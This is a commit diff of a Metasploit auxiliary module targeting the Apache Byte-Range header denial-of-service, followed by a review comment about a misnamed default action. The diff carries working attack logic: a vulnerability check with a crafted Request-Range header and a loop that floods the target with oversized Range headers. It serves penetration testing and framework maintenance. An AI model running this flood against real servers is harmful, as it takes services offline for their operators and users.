Uses "ACTIONS" keys instead of datastore options
It's better to use ACTIONS instead of datastore in this case. Also, did some cleanup.
parent
1714fa21b1
commit
7e28a4ddb0
|
@ -1,7 +1,3 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
@ -35,7 +31,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
|
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Actions' =>
|
||||||
|
[
|
||||||
|
['DOS'],
|
||||||
|
['CHECK']
|
||||||
|
],
|
||||||
|
'DefaultAction' => 'PUT',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'BID', '49303'],
|
[ 'BID', '49303'],
|
||||||
|
@ -43,43 +44,44 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
[ 'EDB', '17696'],
|
[ 'EDB', '17696'],
|
||||||
[ 'OSVDB', '74721' ],
|
[ 'OSVDB', '74721' ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Aug 19 2011',
|
'DisclosureDate' => 'Aug 19 2011'
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80),
|
Opt::RPORT(80),
|
||||||
OptString.new('URI', [ true, "The request URI", '/']),
|
OptString.new('URI', [ true, "The request URI", '/']),
|
||||||
OptInt.new('RLIMIT', [ true, "Number of requests to send",50]),
|
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
|
||||||
OptEnum.new('ACTION', [true, "DOS or CHECK", "DOS",["DOS","CHECK"]])
|
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
||||||
case datastore['action']
|
case action.name
|
||||||
|
when 'DOS'
|
||||||
|
conduct_dos()
|
||||||
|
|
||||||
when 'DOS'
|
when 'CHECK'
|
||||||
conduct_dos()
|
check_for_dos()
|
||||||
|
|
||||||
when 'CHECK'
|
|
||||||
check_for_dos()
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_for_dos()
|
def check_for_dos()
|
||||||
path = datastore['URI']
|
path = datastore['URI']
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => path,
|
'uri' => path,
|
||||||
'method' => 'HEAD',
|
'method' => 'HEAD',
|
||||||
'headers' => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} })
|
'headers' => {
|
||||||
|
"HOST" => "Localhost",
|
||||||
if (res and res.code == 206)
|
"Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
|
||||||
print_status("Response was #{res.code}")
|
}
|
||||||
print_status("Found Byte-Range Header DOS at #{path}")
|
})
|
||||||
|
|
||||||
|
if (res and res.code == 206)
|
||||||
|
print_status("Response was #{res.code}")
|
||||||
|
print_status("Found Byte-Range Header DOS at #{path}")
|
||||||
|
|
||||||
report_note(
|
report_note(
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
|
@ -87,16 +89,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:data => "Apache Byte-Range DOS at #{path}"
|
:data => "Apache Byte-Range DOS at #{path}"
|
||||||
)
|
)
|
||||||
|
|
||||||
else
|
else
|
||||||
print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
|
print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
|
||||||
|
end
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -111,10 +110,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
begin
|
begin
|
||||||
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
|
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'HEAD',
|
'method' => 'HEAD',
|
||||||
'headers' => { "HOST" => rhost,
|
'headers' => {
|
||||||
"Range" => "bytes=0-#{ranges}"}},1)
|
"HOST" => rhost,
|
||||||
|
"Range" => "bytes=0-#{ranges}"}},1)
|
||||||
|
|
||||||
rescue ::Rex::ConnectionRefused
|
rescue ::Rex::ConnectionRefused
|
||||||
print_status("Unable to connect to #{rhost}:#{rport}.")
|
print_status("Unable to connect to #{rhost}:#{rport}.")
|
||||||
rescue ::Errno::ECONNRESET
|
rescue ::Errno::ECONNRESET
|
||||||
|
|
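Review bot: `'DefaultAction' => 'PUT'` in the `@ -35,7 +31,12 @@` hunk names an action that the new `'Actions'` list does not declare; only `DOS` and `CHECK` are defined there. When no ACTION is set, the default lookup presumably finds nothing, so `case action.name` in `run_host` would either fail on a nil action or fall through without running anything, and the `"DOS"` default of the removed `OptEnum` is lost. Point the default at a declared action: `'DefaultAction' => 'CHECK'` makes an unconfigured run only probe the target instead of sending the request flood, while `'DOS'` keeps the previous default. An `else` branch in the `case` that prints the unrecognised action name would make a misconfiguration visible instead of silent. The info hash this line belongs to starts outside the hunk, so the rest of `initialize` is not visible here.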